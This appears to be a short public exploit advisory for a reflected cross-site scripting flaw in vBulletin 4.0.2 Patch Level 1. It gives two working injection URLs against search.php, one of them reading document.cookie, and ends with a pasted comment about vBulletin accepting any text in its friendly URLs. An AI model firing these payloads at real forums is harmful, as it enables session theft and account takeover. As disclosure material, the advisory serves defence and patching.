Cross Site Scripting Vulnerability for Internet Brands vBulletin 4.0.2 Patch Level 1

Vendor: Internet Brands (Nasdaq: INET)
Software: vBulletin
Version: 4.0.2 Patch Level 1
Type: Cross Site Scripting

[+] Discovered By: 5ubzer0
[+] My id : http://inj3ct0r.com/author/2307
[+] Original : http://inj3ct0r.com/exploits/9697
# Version: Vbulletin 4.0.2

www.site.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query=">
<script>alert('xss');</script>
www.site.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query=">
<script>alert(document.cookie);</script>
  • http://www.vbulletin.com/forum/project.php?issueid=37797 friendly urls in vb4

    this is not a comment, but I wanted to inform you guys of yet another serious, dead serious bug on vb4

    here is the copy paste work

    ———–

    A serious bug in SEO-ed URL’s in vB4.

    Look at the first original URL

    [URL]http://www.vbulletin.com/forum/showthread.php?349143-Hello-to-the-vBulletin-community[/URL]

    and the modified one

    [URL]http://www.vbulletin.com/forum/showthread.php?349143-OK-Fabian-fix-the-damn-thing-cause-it-sucks[/URL]

    The manually modified URL leads to same page, providing thread ID remains after showthread.php?

    How could vB devs allow something like that go unnoticed is beyond me. This can have serious implications on forum rankings, forum reputation and all range of other things. In short hell breaks loose.

    This might have been known for a long time, but I thought it’s worth sharing.

    ——————–